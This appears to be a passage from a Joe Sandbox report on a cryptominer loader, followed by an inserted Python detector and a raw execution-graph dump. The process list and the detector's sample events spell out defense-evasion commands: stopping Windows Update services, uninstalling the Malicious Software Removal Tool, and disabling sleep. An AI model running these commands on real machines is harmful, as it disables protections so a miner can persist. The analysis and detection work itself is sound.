                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\wusa.exe
                                      Wow64 process (32bit):false
                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                      Imagebase:0x7ff786ec0000
                                      File size:345'088 bytes
                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:42
                                      Start time:11:05:06
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:43
                                      Start time:11:05:06
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:44
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:45
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:46
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop bits
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:47
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:48
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop dosvc
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:49
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:50
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                      Imagebase:0x7ff62edd0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:51
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                      Imagebase:0x7ff62edd0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:52
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:53
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                      Imagebase:0x7ff62edd0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:54
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:55
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                      Imagebase:0x7ff62edd0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:56
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:57
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:58
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:59
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:svchost.exe
                                      Imagebase:0x7ff7e52b0000
                                      File size:55'320 bytes
                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                      Has exited:false
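The process list above is, read top to bottom, one procedure: stop the update and delivery services (UsoSvc, WaaSMedicSvc, wuauserv, bits, dosvc), remove the Malicious Software Removal Tool (KB890830) with wusa, zero every hibernate and standby timeout with powercfg, then start a bare svchost.exe that later matches the Xmrig Yara rule. Each step on its own has a benign explanation; the combination inside one session is what a detection should key on. The following is an added example, not part of the Joe Sandbox report or of the sample: detection logic that replays process-creation events and scores that combination. The event records are constructed here to mirror the report's command lines (a conhost entry and a normal `svchost.exe -k` line are included as negatives); in production the same fields would come from Sysmon Event ID 1 or Security 4688. The whitespace tokenisation and the severity threshold are simplifications chosen for the example.

```python
"""Score the service-stop / MSRT-removal / no-sleep / bare-svchost chain
seen in the report's process list.  Added example; events are constructed."""
from collections import defaultdict

# Update and delivery services the loader stops so the host stays unpatched
# and nothing reboots or re-scans it.
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}

# powercfg /x switches that, when set to 0, keep the machine from sleeping.
POWER_TIMEOUTS = {"-hibernate-timeout-ac", "-hibernate-timeout-dc",
                  "-standby-timeout-ac", "-standby-timeout-dc"}

MSRT_KB = "kb:890830"  # Windows Malicious Software Removal Tool


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(image, cmdline):
    """Map one process-creation event to (category, detail), or None.

    The command line is split on whitespace; that is enough for the
    report's command lines, which carry no quoted arguments.  A real
    pipeline should use the argv the sensor already parsed."""
    exe = _basename(image)
    toks = cmdline.lower().split()

    # sc.exe stop <service> against an update/delivery service
    if exe == "sc.exe" and len(toks) >= 3 and toks[1] == "stop":
        if toks[2] in UPDATE_SERVICES:
            return ("service_stop", toks[2])

    # wusa /uninstall /kb:890830, launched directly or wrapped in cmd /c
    if exe in ("wusa.exe", "cmd.exe") and "/uninstall" in toks \
            and f"/{MSRT_KB}" in toks:
        return ("msrt_removal", MSRT_KB)

    # powercfg /x <timeout switch> 0
    if exe == "powercfg.exe" and "/x" in toks:
        for i, tok in enumerate(toks):
            if tok in POWER_TIMEOUTS and i + 1 < len(toks) and toks[i + 1] == "0":
                return ("sleep_disabled", tok)

    # A genuine service host always carries -k <group>; a bare svchost.exe
    # is a process someone started by hand to hide a payload in.
    if exe == "svchost.exe" and "-k" not in toks:
        return ("bare_svchost", cmdline)

    return None


def score_host(events):
    """events: iterable of (image, cmdline) for one host/session.

    Returns the distinct categories hit, their details and a severity.
    Three or more categories together is the chain from the report;
    one alone (an admin stopping BITS, a kiosk that must not sleep) is
    only worth a medium-priority look."""
    hits = defaultdict(set)
    for image, cmdline in events:
        result = classify(image, cmdline)
        if result:
            hits[result[0]].add(result[1])
    categories = sorted(hits)
    if len(categories) >= 3:
        severity = "high"
    elif categories:
        severity = "medium"
    else:
        severity = "none"
    return {"categories": categories,
            "details": {k: sorted(v) for k, v in hits.items()},
            "severity": severity}


# Constructed sample mirroring the process list in the report (conhost and a
# normal "-k" svchost are present to show that they do not fire).
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart"),
    (r"C:\Windows\System32\sc.exe", r"C:\Windows\system32\sc.exe stop UsoSvc"),
    (r"C:\Windows\System32\wusa.exe", r"wusa /uninstall /kb:890830 /quiet /norestart"),
    (r"C:\Windows\System32\sc.exe", r"C:\Windows\system32\sc.exe stop WaaSMedicSvc"),
    (r"C:\Windows\System32\sc.exe", r"C:\Windows\system32\sc.exe stop wuauserv"),
    (r"C:\Windows\System32\sc.exe", r"C:\Windows\system32\sc.exe stop bits"),
    (r"C:\Windows\System32\sc.exe", r"C:\Windows\system32\sc.exe stop dosvc"),
    (r"C:\Windows\System32\powercfg.exe", r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0"),
    (r"C:\Windows\System32\powercfg.exe", r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0"),
    (r"C:\Windows\System32\powercfg.exe", r"C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0"),
    (r"C:\Windows\System32\powercfg.exe", r"C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0"),
    (r"C:\Windows\System32\svchost.exe", r"svchost.exe"),
    (r"C:\Windows\System32\svchost.exe", r"C:\Windows\system32\svchost.exe -k netsvcs -p"),
]

if __name__ == "__main__":
    print(score_host(SAMPLE_EVENTS))
```

Run against the constructed sample this reports severity `high` with all four categories present; the `-k netsvcs` svchost and the conhost lines contribute nothing. On a live estate the same logic belongs behind a per-host, per-session grouping (parent process or logon ID) so the five `sc stop` calls and the powercfg calls are correlated rather than alerted on one by one.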

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2136602851.00007FF683C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF683C20000, based on PE: true
                                         • Associated: 00000000.00000002.2136545200.00007FF683C20000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2136680469.00007FF683C2D000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2136723867.00007FF683C31000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2136751847.00007FF683C32000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137570781.00007FF684126000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137595951.00007FF68412A000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff683c20000_lokigod.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 42430f2344ef8e2c73b5046c9819b9514e03832da236caddbb8b9f06a9f0945f
                                        • Instruction ID: a47695c546d8642032c18a294e44e99f82216e486646eca9f85e5dcb0f1d17ab
                                        • Opcode Fuzzy Hash: 42430f2344ef8e2c73b5046c9819b9514e03832da236caddbb8b9f06a9f0945f
                                        • Instruction Fuzzy Hash: BFB01230D05349C4E3002F01D94735832707F1C740F542434C40C63362CEFE5041CB10
                                        Memory Dump Source
                                        • Source File: 00000022.00000002.2163566166.00007FF721EC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF721EC0000, based on PE: true
                                         • Associated: 00000022.00000002.2163537379.00007FF721EC0000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000022.00000002.2163600475.00007FF721ECD000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000022.00000002.2163627936.00007FF721ED1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000022.00000002.2163869267.00007FF722150000.00000008.00000001.01000000.00000004.sdmp
                                         • Associated: 00000022.00000002.2164151876.00007FF7223C6000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000022.00000002.2164181148.00007FF7223CA000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_34_2_7ff721ec0000_vzppfnnlsyit.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 42430f2344ef8e2c73b5046c9819b9514e03832da236caddbb8b9f06a9f0945f
                                        • Instruction ID: b73dfca4bb871a74ce373da8ad7e7952feda018f142462b2a8ae9dec4e99c19e
                                        • Opcode Fuzzy Hash: 42430f2344ef8e2c73b5046c9819b9514e03832da236caddbb8b9f06a9f0945f
                                        • Instruction Fuzzy Hash: CFB09260D0520988E3003B059C4225C62A0FB58782F800020C40C42352CAAE90418F60

                                        Execution Graph

                                        Execution Coverage:2.2%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:13.6%
                                        Total number of Nodes:897
                                        Total number of Limit Nodes:2
                                         execution_graph (rendered as a graph in the report; the raw node/edge dump is omitted here). Nodes are functions in the 0x140001000 region of the injected image. API calls reachable in the graph: VirtualProtect, VirtualQuery, GetLastError, malloc, free, memcpy, memset, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, TlsGetValue, signal, SetUnhandledExceptionFilter, __set_app_type, __setusermatherr, _amsg_exit, _initterm, _cexit, fprintf, strlen, wcslen, wcscpy, wcscat, wcsstr, _wcsnicmp, Sleep and NtFilterToken. The stub at 0x140001394 (malloc followed by NtFilterToken) is invoked from a long chain of consecutive thunks starting at 0x140001404; the wide-string routines (wcslen, wcscpy, wcscat, _wcsnicmp, wcsstr, memset) cluster in the 0x140003240 to 0x140005f5e range. The dump is truncated in the captured page.
14000154e 2429->2430 2431 140001394 2 API calls 2430->2431 2432 14000155d 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000156c 2433->2434 2435 140001394 2 API calls 2434->2435 2436 14000157b 2435->2436 2437 140001394 2 API calls 2436->2437 2438 14000158a 2437->2438 2439 140001394 2 API calls 2438->2439 2440 140001599 2439->2440 2441 140001394 2 API calls 2440->2441 2442 1400015a8 2441->2442 2443 140001394 2 API calls 2442->2443 2444 1400015b7 2443->2444 2445 140001394 2 API calls 2444->2445 2446 1400015c6 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015d5 2447->2448 2449 140001394 2 API calls 2448->2449 2450 1400015e4 2449->2450 2451 140001394 2 API calls 2450->2451 2452 1400015f3 2451->2452 2452->2291 2453 14000156c 2452->2453 2454 140001394 2 API calls 2453->2454 2455 14000157b 2454->2455 2456 140001394 2 API calls 2455->2456 2457 14000158a 2456->2457 2458 140001394 2 API calls 2457->2458 2459 140001599 2458->2459 2460 140001394 2 API calls 2459->2460 2461 1400015a8 2460->2461 2462 140001394 2 API calls 2461->2462 2463 1400015b7 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015c6 2464->2465 2466 140001394 2 API calls 2465->2466 2467 1400015d5 2466->2467 2468 140001394 2 API calls 2467->2468 2469 1400015e4 2468->2469 2470 140001394 2 API calls 2469->2470 2471 1400015f3 2470->2471 2471->2291 2472 14000145e 2471->2472 2473 140001394 2 API calls 2472->2473 2474 14000146d 2473->2474 2475 140001394 2 API calls 2474->2475 2476 14000147c 2475->2476 2477 140001394 2 API calls 2476->2477 2478 14000148b 2477->2478 2479 140001394 2 API calls 2478->2479 2480 14000149a 2479->2480 2481 140001394 2 API calls 2480->2481 2482 1400014a9 2481->2482 2483 140001394 2 API calls 2482->2483 2484 1400014b8 2483->2484 2485 140001394 2 API calls 2484->2485 2486 1400014c7 2485->2486 2487 140001394 2 API calls 2486->2487 2488 1400014d6 2487->2488 2489 1400014e5 2488->2489 2490 140001394 2 API calls 2488->2490 2491 140001394 2 API calls 2489->2491 2490->2489 
2492 1400014ef 2491->2492 2493 1400014f4 2492->2493 2494 140001394 2 API calls 2492->2494 2495 140001394 2 API calls 2493->2495 2494->2493 2496 1400014fe 2495->2496 2497 140001503 2496->2497 2498 140001394 2 API calls 2496->2498 2499 140001394 2 API calls 2497->2499 2498->2497 2500 14000150d 2499->2500 2501 140001394 2 API calls 2500->2501 2502 140001512 2501->2502 2503 140001394 2 API calls 2502->2503 2504 140001521 2503->2504 2505 140001394 2 API calls 2504->2505 2506 140001530 2505->2506 2507 140001394 2 API calls 2506->2507 2508 14000153f 2507->2508 2509 140001394 2 API calls 2508->2509 2510 14000154e 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000155d 2511->2512 2513 140001394 2 API calls 2512->2513 2514 14000156c 2513->2514 2515 140001394 2 API calls 2514->2515 2516 14000157b 2515->2516 2517 140001394 2 API calls 2516->2517 2518 14000158a 2517->2518 2519 140001394 2 API calls 2518->2519 2520 140001599 2519->2520 2521 140001394 2 API calls 2520->2521 2522 1400015a8 2521->2522 2523 140001394 2 API calls 2522->2523 2524 1400015b7 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015c6 2525->2526 2527 140001394 2 API calls 2526->2527 2528 1400015d5 2527->2528 2529 140001394 2 API calls 2528->2529 2530 1400015e4 2529->2530 2531 140001394 2 API calls 2530->2531 2532 1400015f3 2531->2532 2532->2291 2534 140001394 2 API calls 2533->2534 2535 14000158a 2534->2535 2536 140001394 2 API calls 2535->2536 2537 140001599 2536->2537 2538 140001394 2 API calls 2537->2538 2539 1400015a8 2538->2539 2540 140001394 2 API calls 2539->2540 2541 1400015b7 2540->2541 2542 140001394 2 API calls 2541->2542 2543 1400015c6 2542->2543 2544 140001394 2 API calls 2543->2544 2545 1400015d5 2544->2545 2546 140001394 2 API calls 2545->2546 2547 1400015e4 2546->2547 2548 140001394 2 API calls 2547->2548 2549 1400015f3 2548->2549 2549->2367 2551 140001394 2 API calls 2550->2551 2552 1400015a8 2551->2552 2553 140001394 2 API calls 2552->2553 2554 1400015b7 2553->2554 2555 
140001394 2 API calls 2554->2555 2556 1400015c6 2555->2556 2557 140001394 2 API calls 2556->2557 2558 1400015d5 2557->2558 2559 140001394 2 API calls 2558->2559 2560 1400015e4 2559->2560 2561 140001394 2 API calls 2560->2561 2562 1400015f3 2561->2562 2562->2367 2564 140001394 2 API calls 2563->2564 2565 1400015b7 2564->2565 2566 140001394 2 API calls 2565->2566 2567 1400015c6 2566->2567 2568 140001394 2 API calls 2567->2568 2569 1400015d5 2568->2569 2570 140001394 2 API calls 2569->2570 2571 1400015e4 2570->2571 2572 140001394 2 API calls 2571->2572 2573 1400015f3 2572->2573 2573->2367 2575 140001394 2 API calls 2574->2575 2576 14000147c 2575->2576 2577 140001394 2 API calls 2576->2577 2578 14000148b 2577->2578 2579 140001394 2 API calls 2578->2579 2580 14000149a 2579->2580 2581 140001394 2 API calls 2580->2581 2582 1400014a9 2581->2582 2583 140001394 2 API calls 2582->2583 2584 1400014b8 2583->2584 2585 140001394 2 API calls 2584->2585 2586 1400014c7 2585->2586 2587 140001394 2 API calls 2586->2587 2588 1400014d6 2587->2588 2589 1400014e5 2588->2589 2590 140001394 2 API calls 2588->2590 2591 140001394 2 API calls 2589->2591 2590->2589 2592 1400014ef 2591->2592 2593 1400014f4 2592->2593 2594 140001394 2 API calls 2592->2594 2595 140001394 2 API calls 2593->2595 2594->2593 2596 1400014fe 2595->2596 2597 140001503 2596->2597 2598 140001394 2 API calls 2596->2598 2599 140001394 2 API calls 2597->2599 2598->2597 2600 14000150d 2599->2600 2601 140001394 2 API calls 2600->2601 2602 140001512 2601->2602 2603 140001394 2 API calls 2602->2603 2604 140001521 2603->2604 2605 140001394 2 API calls 2604->2605 2606 140001530 2605->2606 2607 140001394 2 API calls 2606->2607 2608 14000153f 2607->2608 2609 140001394 2 API calls 2608->2609 2610 14000154e 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000155d 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000156c 2613->2614 2615 140001394 2 API calls 2614->2615 2616 14000157b 2615->2616 2617 140001394 2 API calls 
2616->2617 2618 14000158a 2617->2618 2619 140001394 2 API calls 2618->2619 2620 140001599 2619->2620 2621 140001394 2 API calls 2620->2621 2622 1400015a8 2621->2622 2623 140001394 2 API calls 2622->2623 2624 1400015b7 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015c6 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015d5 2627->2628 2629 140001394 2 API calls 2628->2629 2630 1400015e4 2629->2630 2631 140001394 2 API calls 2630->2631 2632 1400015f3 2631->2632 2632->2354 2633 140001530 2632->2633 2634 140001394 2 API calls 2633->2634 2635 14000153f 2634->2635 2636 140001394 2 API calls 2635->2636 2637 14000154e 2636->2637 2638 140001394 2 API calls 2637->2638 2639 14000155d 2638->2639 2640 140001394 2 API calls 2639->2640 2641 14000156c 2640->2641 2642 140001394 2 API calls 2641->2642 2643 14000157b 2642->2643 2644 140001394 2 API calls 2643->2644 2645 14000158a 2644->2645 2646 140001394 2 API calls 2645->2646 2647 140001599 2646->2647 2648 140001394 2 API calls 2647->2648 2649 1400015a8 2648->2649 2650 140001394 2 API calls 2649->2650 2651 1400015b7 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015c6 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015d5 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015e4 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400015f3 2658->2659 2659->2336 2659->2337 2661 140001394 2 API calls 2660->2661 2662 1400014b8 2661->2662 2663 140001394 2 API calls 2662->2663 2664 1400014c7 2663->2664 2665 140001394 2 API calls 2664->2665 2666 1400014d6 2665->2666 2667 1400014e5 2666->2667 2668 140001394 2 API calls 2666->2668 2669 140001394 2 API calls 2667->2669 2668->2667 2670 1400014ef 2669->2670 2671 1400014f4 2670->2671 2672 140001394 2 API calls 2670->2672 2673 140001394 2 API calls 2671->2673 2672->2671 2674 1400014fe 2673->2674 2675 140001503 2674->2675 2676 140001394 2 API calls 2674->2676 2677 140001394 2 API calls 2675->2677 2676->2675 2678 14000150d 2677->2678 2679 140001394 
2 API calls 2678->2679 2680 140001512 2679->2680 2681 140001394 2 API calls 2680->2681 2682 140001521 2681->2682 2683 140001394 2 API calls 2682->2683 2684 140001530 2683->2684 2685 140001394 2 API calls 2684->2685 2686 14000153f 2685->2686 2687 140001394 2 API calls 2686->2687 2688 14000154e 2687->2688 2689 140001394 2 API calls 2688->2689 2690 14000155d 2689->2690 2691 140001394 2 API calls 2690->2691 2692 14000156c 2691->2692 2693 140001394 2 API calls 2692->2693 2694 14000157b 2693->2694 2695 140001394 2 API calls 2694->2695 2696 14000158a 2695->2696 2697 140001394 2 API calls 2696->2697 2698 140001599 2697->2698 2699 140001394 2 API calls 2698->2699 2700 1400015a8 2699->2700 2701 140001394 2 API calls 2700->2701 2702 1400015b7 2701->2702 2703 140001394 2 API calls 2702->2703 2704 1400015c6 2703->2704 2705 140001394 2 API calls 2704->2705 2706 1400015d5 2705->2706 2707 140001394 2 API calls 2706->2707 2708 1400015e4 2707->2708 2709 140001394 2 API calls 2708->2709 2710 1400015f3 2709->2710 2710->2346 2711 140001440 2710->2711 2712 140001394 2 API calls 2711->2712 2713 14000144f 2712->2713 2714 140001394 2 API calls 2713->2714 2715 14000145e 2714->2715 2716 140001394 2 API calls 2715->2716 2717 14000146d 2716->2717 2718 140001394 2 API calls 2717->2718 2719 14000147c 2718->2719 2720 140001394 2 API calls 2719->2720 2721 14000148b 2720->2721 2722 140001394 2 API calls 2721->2722 2723 14000149a 2722->2723 2724 140001394 2 API calls 2723->2724 2725 1400014a9 2724->2725 2726 140001394 2 API calls 2725->2726 2727 1400014b8 2726->2727 2728 140001394 2 API calls 2727->2728 2729 1400014c7 2728->2729 2730 140001394 2 API calls 2729->2730 2731 1400014d6 2730->2731 2732 1400014e5 2731->2732 2733 140001394 2 API calls 2731->2733 2734 140001394 2 API calls 2732->2734 2733->2732 2735 1400014ef 2734->2735 2736 1400014f4 2735->2736 2737 140001394 2 API calls 2735->2737 2738 140001394 2 API calls 2736->2738 2737->2736 2739 1400014fe 2738->2739 2740 140001503 2739->2740 2741 
140001394 2 API calls 2739->2741 2742 140001394 2 API calls 2740->2742 2741->2740 2743 14000150d 2742->2743 2744 140001394 2 API calls 2743->2744 2745 140001512 2744->2745 2746 140001394 2 API calls 2745->2746 2747 140001521 2746->2747 2748 140001394 2 API calls 2747->2748 2749 140001530 2748->2749 2750 140001394 2 API calls 2749->2750 2751 14000153f 2750->2751 2752 140001394 2 API calls 2751->2752 2753 14000154e 2752->2753 2754 140001394 2 API calls 2753->2754 2755 14000155d 2754->2755 2756 140001394 2 API calls 2755->2756 2757 14000156c 2756->2757 2758 140001394 2 API calls 2757->2758 2759 14000157b 2758->2759 2760 140001394 2 API calls 2759->2760 2761 14000158a 2760->2761 2762 140001394 2 API calls 2761->2762 2763 140001599 2762->2763 2764 140001394 2 API calls 2763->2764 2765 1400015a8 2764->2765 2766 140001394 2 API calls 2765->2766 2767 1400015b7 2766->2767 2768 140001394 2 API calls 2767->2768 2769 1400015c6 2768->2769 2770 140001394 2 API calls 2769->2770 2771 1400015d5 2770->2771 2772 140001394 2 API calls 2771->2772 2773 1400015e4 2772->2773 2774 140001394 2 API calls 2773->2774 2775 1400015f3 2774->2775 2775->2346 2775->2355 2777 1400014e5 2776->2777 2778 140001394 2 API calls 2776->2778 2779 140001394 2 API calls 2777->2779 2778->2777 2780 1400014ef 2779->2780 2781 1400014f4 2780->2781 2782 140001394 2 API calls 2780->2782 2783 140001394 2 API calls 2781->2783 2782->2781 2784 1400014fe 2783->2784 2785 140001503 2784->2785 2786 140001394 2 API calls 2784->2786 2787 140001394 2 API calls 2785->2787 2786->2785 2788 